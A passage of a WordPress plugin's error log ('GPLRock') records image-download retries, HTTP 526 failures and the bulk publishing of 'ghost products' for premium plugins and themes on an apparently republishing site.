wp-file-manager-file-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:55:59 UTC] GPLRock WARNING: Image download failed for product wp-file-manager-file-management-system. URL: https://meldwp.com/wp-content/uploads/wp-file-manager---file-management-system-3484.webp [05-Apr-2026 12:55:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-file-manager-file-management-system [05-Apr-2026 12:55:59 UTC] GPLRock: Image download failed for product easy-digital-downloads-product-audio-sampler-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:01 UTC] GPLRock: Image download failed for product easy-digital-downloads-product-audio-sampler-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easy-digital-downloads-product-audio-sampler-player-24789.webp for product easy-digital-downloads-product-audio-sampler-player after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:04 UTC] GPLRock: Image download failed for product easy-digital-downloads-product-audio-sampler-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:06 UTC] GPLRock: Image download failed for product easy-digital-downloads-product-audio-sampler-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/easy-digital-downloads-product-audio-sampler-player-24789.webp for product easy-digital-downloads-product-audio-sampler-player after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:08 UTC] GPLRock WARNING: Image download failed for product easy-digital-downloads-product-audio-sampler-player. URL: https://meldwp.com/wp-content/uploads/easy-digital-downloads-product-audio-sampler-player-24789.webp [05-Apr-2026 12:56:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: easy-digital-downloads-product-audio-sampler-player [05-Apr-2026 12:56:08 UTC] GPLRock: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:10 UTC] GPLRock: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-featured-news-pro--custom-posts-listing-plugin-33697.webp for product wp-featured-news-pro-custom-posts-listing-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:12 UTC] GPLRock: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:14 UTC] GPLRock: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-featured-news-pro--custom-posts-listing-plugin-33697.webp for product wp-featured-news-pro-custom-posts-listing-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:16 UTC] GPLRock WARNING: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin. URL: https://meldwp.com/wp-content/uploads/wp-featured-news-pro--custom-posts-listing-plugin-33697.webp [05-Apr-2026 12:56:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-featured-news-pro-custom-posts-listing-plugin [05-Apr-2026 12:56:17 UTC] GPLRock: Image download failed for product multi-language-add-on-for-bookpro-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:19 UTC] GPLRock: Image download failed for product multi-language-add-on-for-bookpro-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-language-add-on-for-bookpro-plugin-26292.webp for product multi-language-add-on-for-bookpro-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:21 UTC] GPLRock: Image download failed for product multi-language-add-on-for-bookpro-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:23 UTC] GPLRock: Image download failed for product multi-language-add-on-for-bookpro-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-language-add-on-for-bookpro-plugin-26292.webp for product multi-language-add-on-for-bookpro-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:25 UTC] GPLRock WARNING: Image download failed for product multi-language-add-on-for-bookpro-plugin. URL: https://meldwp.com/wp-content/uploads/multi-language-add-on-for-bookpro-plugin-26292.webp [05-Apr-2026 12:56:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multi-language-add-on-for-bookpro-plugin [05-Apr-2026 12:56:25 UTC] GPLRock: Image downloaded successfully for product separator-for-wpbakery-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5c73d2ca.webp [05-Apr-2026 12:56:25 UTC] GPLRock: Using pre-downloaded image for product separator-for-wpbakery-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5c73d2ca.webp [05-Apr-2026 12:56:25 UTC] GPLRock: Ghost product published with image - Product ID: separator-for-wpbakery-page-builder [05-Apr-2026 12:56:26 UTC] GPLRock: Image download failed for product meetair-ios-and-android-video-conference-app-for-live-class-meeting-webinar-online-training (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:28 UTC] GPLRock: Image download failed for product meetair-ios-and-android-video-conference-app-for-live-class-meeting-webinar-online-training (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/meetair---ios-and-android-video-conference-app-for-live-class-meeting-webinar-on-11887.webp for product meetair-ios-and-android-video-conference-app-for-live-class-meeting-webinar-online-training after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:30 UTC] GPLRock: Image download failed for product meetair-ios-and-android-video-conference-app-for-live-class-meeting-webinar-online-training (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:32 UTC] GPLRock: Image download failed for product meetair-ios-and-android-video-conference-app-for-live-class-meeting-webinar-online-training (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/meetair---ios-and-android-video-conference-app-for-live-class-meeting-webinar-on-11887.webp for product meetair-ios-and-android-video-conference-app-for-live-class-meeting-webinar-online-training after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:34 UTC] GPLRock WARNING: Image download failed for product meetair-ios-and-android-video-conference-app-for-live-class-meeting-webinar-online-training. URL: https://meldwp.com/wp-content/uploads/meetair---ios-and-android-video-conference-app-for-live-class-meeting-webinar-on-11887.webp [05-Apr-2026 12:56:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: meetair-ios-and-android-video-conference-app-for-live-class-meeting-webinar-online-training [05-Apr-2026 12:56:34 UTC] GPLRock: Image downloaded successfully for product contactme-responsive-ajax-contact-form-html5-php (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0cb362aa.webp [05-Apr-2026 12:56:34 UTC] GPLRock: Using pre-downloaded image for product contactme-responsive-ajax-contact-form-html5-php: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0cb362aa.webp [05-Apr-2026 12:56:34 UTC] GPLRock: Ghost product published with image - Product ID: contactme-responsive-ajax-contact-form-html5-php [05-Apr-2026 12:56:34 UTC] GPLRock: Image download failed for product ratemash-responsive-wordpress-voting-contest-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:37 UTC] GPLRock: Image download failed for product ratemash-responsive-wordpress-voting-contest-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ratemash---responsive-wordpress-voting-contest-plugin-23897.webp for product ratemash-responsive-wordpress-voting-contest-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:39 UTC] GPLRock: Image download failed for product ratemash-responsive-wordpress-voting-contest-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:41 UTC] GPLRock: Image download failed for product ratemash-responsive-wordpress-voting-contest-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:56:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ratemash---responsive-wordpress-voting-contest-plugin-23897.webp for product ratemash-responsive-wordpress-voting-contest-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:56:43 UTC] GPLRock WARNING: Image download failed for product ratemash-responsive-wordpress-voting-contest-plugin. URL: https://meldwp.com/wp-content/uploads/ratemash---responsive-wordpress-voting-contest-plugin-23897.webp [05-Apr-2026 12:56:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ratemash-responsive-wordpress-voting-contest-plugin [05-Apr-2026 12:57:05 UTC] GPLRock: Image downloaded successfully for product overton-creative-theme-for-agencies-and-freelancers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1d3993fc.jpg [05-Apr-2026 12:57:05 UTC] GPLRock: Using pre-downloaded image for product overton-creative-theme-for-agencies-and-freelancers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1d3993fc.jpg [05-Apr-2026 12:57:05 UTC] GPLRock: Ghost product published with image - Product ID: overton-creative-theme-for-agencies-and-freelancers [05-Apr-2026 12:57:07 UTC] GPLRock: Image downloaded successfully for product memberpress-importer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e1cd1c3.jpg [05-Apr-2026 12:57:07 UTC] GPLRock: Using pre-downloaded image for product memberpress-importer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e1cd1c3.jpg [05-Apr-2026 12:57:07 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-importer [05-Apr-2026 12:57:08 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-account-funds-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0583ade5.jpg [05-Apr-2026 12:57:08 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-account-funds-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0583ade5.jpg [05-Apr-2026 12:57:08 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-account-funds-premium [05-Apr-2026 12:57:10 UTC] GPLRock: Image downloaded successfully for product css-igniter-roxima-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-259c76fd.jpg [05-Apr-2026 12:57:10 UTC] GPLRock: Using pre-downloaded image for product css-igniter-roxima-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-259c76fd.jpg [05-Apr-2026 12:57:10 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-roxima-wordpress-theme [05-Apr-2026 12:57:12 UTC] GPLRock: Image downloaded successfully for product css-igniter-lense-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c67a0aee.jpg [05-Apr-2026 12:57:12 UTC] GPLRock: Using pre-downloaded image for product css-igniter-lense-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c67a0aee.jpg [05-Apr-2026 12:57:12 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-lense-wordpress-theme [05-Apr-2026 12:57:14 UTC] GPLRock: Image downloaded successfully for product studiopress-business-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66899658.jpg [05-Apr-2026 12:57:14 UTC] GPLRock: Using pre-downloaded image for product studiopress-business-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66899658.jpg [05-Apr-2026 12:57:14 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-business-pro-genesis-wordpress-theme [05-Apr-2026 12:57:15 UTC] GPLRock: Image downloaded successfully for product mainwp-article-uploader (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-caad2dbb.jpg [05-Apr-2026 12:57:15 UTC] GPLRock: Using pre-downloaded image for product mainwp-article-uploader: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-caad2dbb.jpg [05-Apr-2026 12:57:15 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-article-uploader [05-Apr-2026 12:57:17 UTC] GPLRock: Image downloaded successfully for product css-igniter-oikia-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4932e0c0.jpg [05-Apr-2026 12:57:17 UTC] GPLRock: Using pre-downloaded image for product css-igniter-oikia-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4932e0c0.jpg [05-Apr-2026 12:57:17 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-oikia-wordpress-theme [05-Apr-2026 12:57:19 UTC] GPLRock: Image downloaded successfully for product satellite7-retina-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a064ee3a.jpg [05-Apr-2026 12:57:19 UTC] GPLRock: Using pre-downloaded image for product satellite7-retina-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a064ee3a.jpg [05-Apr-2026 12:57:19 UTC] GPLRock: Ghost product published with image - Product ID: satellite7-retina-multi-purpose-wordpress-theme [05-Apr-2026 12:57:21 UTC] GPLRock: Image downloaded successfully for product userpro-media-manager-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38935433.jpg [05-Apr-2026 12:57:21 UTC] GPLRock: Using pre-downloaded image for product userpro-media-manager-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38935433.jpg [05-Apr-2026 12:57:21 UTC] GPLRock: Ghost product published with image - Product ID: userpro-media-manager-add-on [05-Apr-2026 12:59:12 UTC] GPLRock: Image downloaded successfully for product sebian-multi-purpose-wordpress-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9fe32480.jpg [05-Apr-2026 12:59:12 UTC] GPLRock: Using pre-downloaded image for product sebian-multi-purpose-wordpress-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9fe32480.jpg [05-Apr-2026 12:59:12 UTC] GPLRock: Ghost product published with image - Product ID: sebian-multi-purpose-wordpress-woocommerce-theme [05-Apr-2026 12:59:13 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-authorize-net-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3fa16603.jpg [05-Apr-2026 12:59:13 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-authorize-net-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3fa16603.jpg [05-Apr-2026 12:59:13 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-authorize-net-payment-gateway [05-Apr-2026 12:59:15 UTC] GPLRock: Image downloaded successfully for product derwati-trendy-creative-portfolio-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-249dcc5d.jpg [05-Apr-2026 12:59:15 UTC] GPLRock: Using pre-downloaded image for product derwati-trendy-creative-portfolio-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-249dcc5d.jpg [05-Apr-2026 12:59:15 UTC] GPLRock: Ghost product published with image - Product ID: derwati-trendy-creative-portfolio-theme [05-Apr-2026 12:59:17 UTC] GPLRock: Image downloaded successfully for product autoresq-car-repair-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c44f6bb4.jpg [05-Apr-2026 12:59:17 UTC] GPLRock: Using pre-downloaded image for product autoresq-car-repair-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c44f6bb4.jpg [05-Apr-2026 12:59:17 UTC] GPLRock: Ghost product published with image - Product ID: autoresq-car-repair-wordpress-theme [05-Apr-2026 12:59:18 UTC] GPLRock: Image downloaded successfully for product anemos-a-multiuse-blogging-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-009e7581.jpg [05-Apr-2026 12:59:19 UTC] GPLRock: Using pre-downloaded image for product anemos-a-multiuse-blogging-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-009e7581.jpg [05-Apr-2026 12:59:19 UTC] GPLRock: Ghost product published with image - Product ID: anemos-a-multiuse-blogging-wordpress-theme [05-Apr-2026 12:59:21 UTC] GPLRock: Image downloaded successfully for product angle-flat-responsive-bootstrap-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd2eb592.png [05-Apr-2026 12:59:21 UTC] GPLRock: Using pre-downloaded image for product angle-flat-responsive-bootstrap-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd2eb592.png [05-Apr-2026 12:59:21 UTC] GPLRock: Ghost product published with image - Product ID: angle-flat-responsive-bootstrap-multipurpose-wordpress-theme [05-Apr-2026 12:59:22 UTC] GPLRock: Image downloaded successfully for product package-quantity-discount-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe4f3fb7.png [05-Apr-2026 12:59:23 UTC] GPLRock: Using pre-downloaded image for product package-quantity-discount-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe4f3fb7.png [05-Apr-2026 12:59:23 UTC] GPLRock: Ghost product published with image - Product ID: package-quantity-discount-for-woocommerce [05-Apr-2026 12:59:24 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-restrict-content-pro-member-discounts-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e15f2e41.jpg [05-Apr-2026 12:59:24 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-restrict-content-pro-member-discounts-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e15f2e41.jpg [05-Apr-2026 12:59:24 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-restrict-content-pro-member-discounts-addon [05-Apr-2026 12:59:26 UTC] GPLRock: Image downloaded successfully for product asa-responsive-coming-soon-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec5963be.jpg [05-Apr-2026 12:59:26 UTC] GPLRock: Using pre-downloaded image for product asa-responsive-coming-soon-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec5963be.jpg [05-Apr-2026 12:59:26 UTC] GPLRock: Ghost product published with image - Product ID: asa-responsive-coming-soon-template [05-Apr-2026 12:59:28 UTC] GPLRock: Image downloaded successfully for product arden-a-sharp-modern-multipurpose-wordpress-theme-2 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-202b7a52.jpg [05-Apr-2026 12:59:28 UTC] GPLRock: Using pre-downloaded image for product arden-a-sharp-modern-multipurpose-wordpress-theme-2: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-202b7a52.jpg [05-Apr-2026 12:59:28 UTC] GPLRock: Ghost product published with image - Product ID: arden-a-sharp-modern-multipurpose-wordpress-theme-2 [05-Apr-2026 13:02:28 UTC] GPLRock: Image downloaded successfully for product multiple-vendor-for-rental-marketplace-in-woocommerce-add-ons (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-006ec853.webp [05-Apr-2026 13:02:28 UTC] GPLRock: Using pre-downloaded image for product multiple-vendor-for-rental-marketplace-in-woocommerce-add-ons: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-006ec853.webp [05-Apr-2026 13:02:28 UTC] GPLRock: Ghost product published with image - Product ID: multiple-vendor-for-rental-marketplace-in-woocommerce-add-ons [05-Apr-2026 13:02:28 UTC] GPLRock: Image download failed for product carspot-car-directory-listing-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:30 UTC] GPLRock: Image download failed for product carspot-car-directory-listing-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carspot---car-directory-listing-wordpress-plugin-17194.webp for product carspot-car-directory-listing-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:02:33 UTC] GPLRock: Image download failed for product carspot-car-directory-listing-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:35 UTC] GPLRock: Image download failed for product carspot-car-directory-listing-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carspot---car-directory-listing-wordpress-plugin-17194.webp for product carspot-car-directory-listing-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:02:37 UTC] GPLRock WARNING: Image download failed for product carspot-car-directory-listing-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/carspot---car-directory-listing-wordpress-plugin-17194.webp [05-Apr-2026 13:02:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: carspot-car-directory-listing-wordpress-plugin [05-Apr-2026 13:02:37 UTC] GPLRock: Image download failed for product zuz-live-web-phone-call-chat-support-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:39 UTC] GPLRock: Image download failed for product zuz-live-web-phone-call-chat-support-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zuz-live-web-phone-call--chat-support-plugin-for-wordpress-5526.webp for product zuz-live-web-phone-call-chat-support-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:02:41 UTC] GPLRock: Image download failed for product zuz-live-web-phone-call-chat-support-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:43 UTC] GPLRock: Image download failed for product zuz-live-web-phone-call-chat-support-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zuz-live-web-phone-call--chat-support-plugin-for-wordpress-5526.webp for product zuz-live-web-phone-call-chat-support-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:02:45 UTC] GPLRock WARNING: Image download failed for product zuz-live-web-phone-call-chat-support-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/zuz-live-web-phone-call--chat-support-plugin-for-wordpress-5526.webp [05-Apr-2026 13:02:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zuz-live-web-phone-call-chat-support-plugin-for-wordpress [05-Apr-2026 13:02:46 UTC] GPLRock: Image download failed for product ultimate-wp-domain-search (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:48 UTC] GPLRock: Image download failed for product ultimate-wp-domain-search (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-wp-domain-search-3482.webp for product ultimate-wp-domain-search after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:02:50 UTC] GPLRock: Image download failed for product ultimate-wp-domain-search (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:52 UTC] GPLRock: Image download failed for product ultimate-wp-domain-search (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-wp-domain-search-3482.webp for product ultimate-wp-domain-search after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:02:54 UTC] GPLRock WARNING: Image download failed for product ultimate-wp-domain-search. URL: https://meldwp.com/wp-content/uploads/ultimate-wp-domain-search-3482.webp [05-Apr-2026 13:02:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-wp-domain-search [05-Apr-2026 13:02:54 UTC] GPLRock: Image downloaded successfully for product fun-facts-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-be15eb96.webp [05-Apr-2026 13:02:54 UTC] GPLRock: Using pre-downloaded image for product fun-facts-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-be15eb96.webp [05-Apr-2026 13:02:54 UTC] GPLRock: Ghost product published with image - Product ID: fun-facts-pro [05-Apr-2026 13:02:55 UTC] GPLRock: Image download failed for product woocommerce-frequently-bought-together (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:57 UTC] GPLRock: Image download failed for product woocommerce-frequently-bought-together (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:02:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-frequently-bought-together-24991.webp for product woocommerce-frequently-bought-together after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:02:59 UTC] GPLRock: Image download failed for product woocommerce-frequently-bought-together (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:01 UTC] GPLRock: Image download failed for product woocommerce-frequently-bought-together (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-frequently-bought-together-24991.webp for product woocommerce-frequently-bought-together after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:03:03 UTC] GPLRock WARNING: Image download failed for product woocommerce-frequently-bought-together. URL: https://meldwp.com/wp-content/uploads/woocommerce-frequently-bought-together-24991.webp [05-Apr-2026 13:03:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-frequently-bought-together [05-Apr-2026 13:03:03 UTC] GPLRock: Image downloaded successfully for product pofily-woocommerce-product-filters-seo-product-filter (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c8798af.webp [05-Apr-2026 13:03:03 UTC] GPLRock: Using pre-downloaded image for product pofily-woocommerce-product-filters-seo-product-filter: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c8798af.webp [05-Apr-2026 13:03:03 UTC] GPLRock: Ghost product published with image - Product ID: pofily-woocommerce-product-filters-seo-product-filter [05-Apr-2026 13:03:03 UTC] GPLRock: Image download failed for product testimonial-awesome-pro-testimonial-plugin-wordpress-slider (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:05 UTC] GPLRock: Image download failed for product testimonial-awesome-pro-testimonial-plugin-wordpress-slider (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/testimonial-awesome-pro---testimonial-plugin-wordpress-slider-9617.webp for product testimonial-awesome-pro-testimonial-plugin-wordpress-slider after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:03:08 UTC] GPLRock: Image download failed for product testimonial-awesome-pro-testimonial-plugin-wordpress-slider (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:10 UTC] GPLRock: Image download failed for product testimonial-awesome-pro-testimonial-plugin-wordpress-slider (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/testimonial-awesome-pro---testimonial-plugin-wordpress-slider-9617.webp for product testimonial-awesome-pro-testimonial-plugin-wordpress-slider after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:03:12 UTC] GPLRock WARNING: Image download failed for product testimonial-awesome-pro-testimonial-plugin-wordpress-slider. URL: https://meldwp.com/wp-content/uploads/testimonial-awesome-pro---testimonial-plugin-wordpress-slider-9617.webp [05-Apr-2026 